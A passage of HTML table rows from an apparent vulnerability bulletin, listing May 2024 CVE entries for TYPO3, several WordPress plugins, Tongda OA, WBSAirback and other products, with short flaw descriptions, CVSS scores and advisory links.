<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34356&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">5.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34356" target="_blank">CVE-2024-34356</a><br><a href="https://github.com/TYPO3/typo3/commit/2832e2f51f929aeddb5de7d667538a33ceda8156" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/TYPO3/typo3/commit/d0393a879a32fb4e3569acad6bdb5cda776be1e5" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/TYPO3/typo3/commit/e95a1224719efafb9cab2d85964f240fd0356e64" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/TYPO3/typo3/security/advisories/GHSA-v6mw-h7w6-59w3" target="_blank">security-advisories@github.com</a><br><a href="https://typo3.org/security/advisory/typo3-core-sa-2024-008" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>TYPO3--typo3<br> </td>
<td>TYPO3 is an enterprise content management system. Starting in version 9.0.0 and prior to versions 9.5.48 ELTS, 10.4.45 ELTS, 11.5.37 LTS, 12.4.15 LTS, and 13.1.1, failing to properly encode user-controlled values in file entities, the `ShowImageController` (`_eID tx_cms_showpic_`) is vulnerable to cross-site scripting. Exploiting this vulnerability requires a valid backend user account with access to file entities. TYPO3 versions 9.5.48 ELTS, 10.4.45 ELTS, 11.5.37 LTS, 12.4.15 LTS, 13.1.1 fix the problem described.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34357&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">5.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34357" target="_blank">CVE-2024-34357</a><br><a href="https://github.com/TYPO3/typo3/commit/376474904f6b9a54dc1b785a2e45277cbd13b0d7" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/TYPO3/typo3/commit/b31d05d1da3eeaeead2d19eb43b1c3f9c88e15ee" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/TYPO3/typo3/commit/d774642381354d3bf5095a5a26e18acd2767f0b1" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/TYPO3/typo3/security/advisories/GHSA-hw6c-6gwq-3m3m" target="_blank">security-advisories@github.com</a><br><a href="https://typo3.org/security/advisory/typo3-core-sa-2024-009" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>TYPO3--typo3<br> </td>
<td>TYPO3 is an enterprise content management system. Starting in version 9.0.0 and prior to versions 9.5.48 ELTS, 10.4.45 ELTS, 11.5.37 LTS, 12.4.15 LTS, and 13.1.1, the `ShowImageController` (`_eID tx_cms_showpic_`) lacks a cryptographic HMAC-signature on the `frame` HTTP query parameter (e.g. `/index.php?eID=tx_cms_showpic?file=3&amp;...&amp;frame=12345`). This allows adversaries to instruct the system to produce an arbitrary number of thumbnail images on the server side. TYPO3 versions 9.5.48 ELTS, 10.4.45 ELTS, 11.5.37 LTS, 12.4.15 LTS, 13.1.1 fix the problem described.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34358&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34358" target="_blank">CVE-2024-34358</a><br><a href="https://github.com/TYPO3/typo3/commit/05c95fed869a1a6dcca06c7077b83b6ea866ff14" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/TYPO3/typo3/commit/1e70ebf736935413b0531004839362b4fb0755a5" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/TYPO3/typo3/commit/df7909b6a1cf0f12a42994d0cc3376b607746142" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/TYPO3/typo3/security/advisories/GHSA-36g8-62qv-5957" target="_blank">security-advisories@github.com</a><br><a href="https://typo3.org/security/advisory/typo3-core-sa-2024-010" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>Tech9logy Creators--WPCS ( WordPress Custom Search )<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tech9logy Creators WPCS ( WordPress Custom Search ) allows Stored XSS.This issue affects WPCS ( WordPress Custom Search ): from n/a through 1.1.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34418&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34418" target="_blank">CVE-2024-34418</a><br><a href="https://patchstack.com/database/vulnerability/wpcs-wp-custom-search/wordpress-wpcs-wordpress-custom-search-plugin-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>The Events Calendar--BookIt<br> </td>
<td>Improper Validation of Specified Quantity in Input vulnerability in The Events Calendar BookIt allows Manipulating Hidden Fields.This issue affects BookIt: from n/a through 2.4.0.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-24715&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-24715" target="_blank">CVE-2024-24715</a><br><a href="https://patchstack.com/database/vulnerability/bookit/wordpress-wordpress-bookit-plugin-plugin-2-4-0-price-bypass-vulnerability-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Theme Freesia--Freesia Empire<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Theme Freesia Freesia Empire allows Stored XSS.This issue affects Freesia Empire: from n/a through 1.4.1.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33955&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33955" target="_blank">CVE-2024-33955</a><br><a href="https://patchstack.com/database/vulnerability/freesia-empire/wordpress-freesia-empire-theme-1-4-1-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>ThemeFuse--Unyson<br> </td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in ThemeFuse Unyson.This issue affects Unyson: from n/a through 2.7.29.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34814&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L" target="_blank" title="CVSS V3 Score">5.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34814" target="_blank">CVE-2024-34814</a><br><a href="https://patchstack.com/database/vulnerability/unyson/wordpress-unyson-plugin-2-7-29-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>ThemeLocation--Custom WooCommerce Checkout Fields Editor<br> </td>
<td>Missing Authorization vulnerability in ThemeLocation Custom WooCommerce Checkout Fields Editor.This issue affects Custom WooCommerce Checkout Fields Editor: from n/a through 1.3.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33956&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33956" target="_blank">CVE-2024-33956</a><br><a href="https://patchstack.com/database/vulnerability/add-fields-to-checkout-page-woocommerce/wordpress-custom-woocommerce-checkout-fields-editor-plugin-1-3-0-broken-access-control-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>ThemeNectar--Salient Shortcodes<br> </td>
<td>The Salient Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'icon' shortcode in all versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3811&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3811" target="_blank">CVE-2024-3811</a><br><a href="https://themeforest.net/item/salient-responsive-multipurpose-theme/4363266" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/70682a2d-16f6-4d7e-bf69-f0f3999f03de?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>ThimPress--Thim Elementor Kit<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThimPress Thim Elementor Kit allows Stored XSS.This issue affects Thim Elementor Kit: from n/a through 1.1.8.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34415&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34415" target="_blank">CVE-2024-34415</a><br><a href="https://patchstack.com/database/vulnerability/thim-elementor-kit/wordpress-thim-elementor-kit-plugin-1-1-8-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>ThroughTek--Kalay SDK<br> </td>
<td>ThroughTek Kalay SDK does not verify the authenticity of received messages, allowing an attacker to impersonate an authoritative server.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-6323&amp;vector=CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-6323" target="_blank">CVE-2023-6323</a><br><a href="https://bitdefender.com/blog/labs/notes-on-throughtek-kalay-vulnerabilities-and-their-impact/" target="_blank">cve-requests@bitdefender.com</a></td>
</tr>
<tr>
<td>Toidicode.com (thanhtaivtt)--Viet Nam Affiliate<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Toidicode.Com (thanhtaivtt) Viet Nam Affiliate allows Stored XSS.This issue affects Viet Nam Affiliate: from n/a through 1.0.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34417&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34417" target="_blank">CVE-2024-34417</a><br><a href="https://patchstack.com/database/vulnerability/viet-nam-affiliate/wordpress-viet-nam-affiliate-plugin-1-0-0-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Tongda--OA<br> </td>
<td>A vulnerability was found in Tongda OA 2017. It has been declared as critical. This vulnerability affects unknown code of the file /general/meeting/manage/delete.php. The manipulation of the argument M_ID_STR leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264436. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4903&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4903" target="_blank">CVE-2024-4903</a><br><a href="https://github.com/Hefei-Coffee/cve/blob/main/sql3.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264436" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264436" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.330632" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Trellix--ePolicy Orchestrator<br> </td>
<td>ePO doesn't allow a regular privileged user to delete tasks or assignments. Insecure direct object references that allow a least privileged user to manipulate the client task and client task assignments, hence escalating his/her privilege.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4843&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4843" target="_blank">CVE-2024-4843</a><br><a href="https://thrive.trellix.com/s/article/000013505" target="_blank">trellixpsirt@trellix.com</a></td>
</tr>
<tr>
<td>UkrSolution--Barcode Scanner with Inventory &amp; Order Manager<br> </td>
<td>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in UkrSolution Barcode Scanner with Inventory &amp; Order Manager.This issue affects Barcode Scanner with Inventory &amp; Order Manager: from n/a through 1.5.4.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34556&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34556" target="_blank">CVE-2024-34556</a><br><a href="https://patchstack.com/database/vulnerability/barcode-scanner-lite-pos-to-manage-products-inventory-and-orders/wordpress-barcode-scanner-with-inventory-order-manager-plugin-1-5-4-sensitive-data-exposure-via-exported-file-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>UkrSolution--Barcode Scanner with Inventory &amp; Order Manager<br> </td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in UkrSolution Barcode Scanner with Inventory &amp; Order Manager.This issue affects Barcode Scanner with Inventory &amp; Order Manager: from n/a through 1.5.4.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34557&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34557" target="_blank">CVE-2024-34557</a><br><a href="https://patchstack.com/database/vulnerability/barcode-scanner-lite-pos-to-manage-products-inventory-and-orders/wordpress-barcode-scanner-with-inventory-order-manager-plugin-1-5-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Uniform Server Zero--Uniform Server Zero<br> </td>
<td>vulnerability in Uniform Server Zero, version 10.2.5, consisting of an XSS through the /us_extra/phpinfo.php page. This vulnerability could allow a remote user to send a specially crafted query to an authenticated user and partially take over their session details.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-5052&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-5052" target="_blank">CVE-2023-5052</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-xss-uniform-server-zero" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>Valiano--Unite Gallery Lite<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Valiano Unite Gallery Lite allows PHP Local File Inclusion.This issue affects Unite Gallery Lite: from n/a through 1.7.59.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-33310&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L" target="_blank" title="CVSS V3 Score">6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-33310" target="_blank">CVE-2023-33310</a><br><a href="https://patchstack.com/database/vulnerability/unite-gallery-lite/wordpress-unite-gallery-lite-plugin-1-7-59-local-file-inclusion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>ValvePress--WordPress Automatic Plugin<br> </td>
<td>The WordPress Automatic Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'autoplay' parameter in all versions up to, and including, 3.94.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4849&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4849" target="_blank">CVE-2024-4849</a><br><a href="https://codecanyon.net/item/wordpress-automatic-plugin/1904470" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4be58bfa-d489-45f5-9169-db8bab718175?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>VeronaLabs--WP SMS<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs WP SMS allows Stored XSS.This issue affects WP SMS: from n/a through 6.5.1.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34811&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34811" target="_blank">CVE-2024-34811</a><br><a href="https://patchstack.com/database/vulnerability/wp-sms/wordpress-wp-sms-plugin-6-5-1-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Visualmodo--Borderless Widgets, Elements, Templates and Toolkit for Elementor &amp; Gutenberg<br> </td>
<td>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Visualmodo Borderless - Widgets, Elements, Templates and Toolkit for Elementor &amp; Gutenberg allows Stored XSS.This issue affects Borderless - Widgets, Elements, Templates and Toolkit for Elementor &amp; Gutenberg: from n/a through 1.5.3.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34757&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34757" target="_blank">CVE-2024-34757</a><br><a href="https://patchstack.com/database/vulnerability/borderless/wordpress-borderless-widgets-elements-templates-and-toolkit-for-elementor-gutenberg-plugin-1-5-3-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>W3 Eden Inc.--Download Manager<br> </td>
<td>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in W3 Eden Inc. Download Manager allows Functionality Bypass.This issue affects Download Manager: from n/a through 3.2.82.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32131&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32131" target="_blank">CVE-2024-32131</a><br><a href="https://patchstack.com/database/vulnerability/download-manager/wordpress-download-manager-plugin-3-2-82-file-password-lock-bypass-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WBSAirback--White Bear Solutions<br> </td>
<td>Vulnerability in WBSAirback 21.02.04, which involves improper neutralisation of Server-Side Includes (SSI), through S3 disks (/admin/DeviceS3). Exploitation of this vulnerability could allow a remote user to execute arbitrary code.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3787&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3787" target="_blank">CVE-2024-3787</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-wbsairback-white-bear-solutions" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>WBSAirback--White Bear Solutions<br> </td>
<td>Vulnerability in WBSAirback 21.02.04, which involves improper neutralisation of Server-Side Includes (SSI), through License (/admin/CDPUsers). Exploitation of this vulnerability could allow a remote user to execute arbitrary code.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3788&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3788" target="_blank">CVE-2024-3788</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-wbsairback-white-bear-solutions" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>WBSAirback--White Bear Solutions<br> </td>
<td>Uncontrolled resource consumption vulnerability in White Bear Solutions WBSAirback, version 21.02.04. This vulnerability could allow an attacker to send multiple command injection payloads to influence the amount of resources consumed.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3789&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3789" target="_blank">CVE-2024-3789</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-wbsairback-white-bear-solutions" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>WBSAirback--White Bear Solutions<br> </td>
<td>Vulnerability in WBSAirback 21.02.04, which consists of a stored Cross-Site Scripting (XSS) through /admin/SystemUsers, login / description fields, passwd1/ passwd2 parameters. Exploitation of this vulnerability could allow a remote user to send a specially crafted URL to the victim and steal their session data.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3790&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">4.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3790" target="_blank">CVE-2024-3790</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-wbsairback-white-bear-solutions" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>WBSAirback--White Bear Solutions<br> </td>
<td>Vulnerability in WBSAirback 21.02.04, which consists of a stored Cross-Site Scripting (XSS) through /admin/SystemConfiguration, name / free memory limit fields , type / password parameters. Exploitation of this vulnerability could allow a remote user to send a specially crafted URL to the victim and steal their session data.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3791&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">4.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3791" target="_blank">CVE-2024-3791</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-wbsairback-white-bear-solutions" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>WBSAirback--White Bear Solutions<br> </td>
<td>Vulnerability in WBSAirback 21.02.04, which consists of a stored Cross-Site Scripting (XSS) through /admin/DeviceReplication, execution range field, all parameters. Exploitation of this vulnerability could allow a remote user to send a specially crafted URL to the victim and steal their session data.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3792&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">4.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3792" target="_blank">CVE-2024-3792</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-wbsairback-white-bear-solutions" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>WBSAirback--White Bear Solutions<br> </td>
<td>Vulnerability in WBSAirback 21.02.04, which consists of a stored Cross-Site Scripting (XSS) through /admin/CloudAccounts, account name / user password / server fields, all parameters. Exploitation of this vulnerability could allow a remote user to send a specially crafted URL to the victim and steal their session data.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3793&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">4.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3793" target="_blank">CVE-2024-3793</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-wbsairback-white-bear-solutions" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>WBSAirback--White Bear Solutions<br> </td>
<td>Vulnerability in WBSAirback 21.02.04, which consists of a stored Cross-Site Scripting (XSS) through /admin/AdvancedSystem, description field, all parameters. Exploitation of this vulnerability could allow a remote user to send a specially crafted URL to the victim and steal their session data.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3794&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">4.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3794" target="_blank">CVE-2024-3794</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-wbsairback-white-bear-solutions" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>WBSAirback--White Bear Solutions<br> </td>
<td>Vulnerability in WBSAirback 21.02.04, which consists of a stored Cross-Site Scripting (XSS) through /admin/BackupTemplate, name / description fields. Exploitation of this vulnerability could allow a remote user to send a specially crafted URL to the victim and steal their session data.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3795&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">4.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3795" target="_blank">CVE-2024-3795</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-wbsairback-white-bear-solutions" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>WBSAirback--White Bear Solutions<br> </td>
<td>Vulnerability in WBSAirback 21.02.04, which consists of a stored Cross-Site Scripting (XSS) through /admin/BackupSchedule, description field. Exploitation of this vulnerability could allow a remote user to send a specially crafted URL to the victim and steal their session data.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3796&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">4.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3796" target="_blank">CVE-2024-3796</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-wbsairback-white-bear-solutions" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>WP Club Manager--WP Club Manager<br> </td>
<td>Missing Authorization vulnerability in WP Club Manager.This issue affects WP Club Manager: from n/a through 2.2.11.</td>
<td>2024-05-14</td>
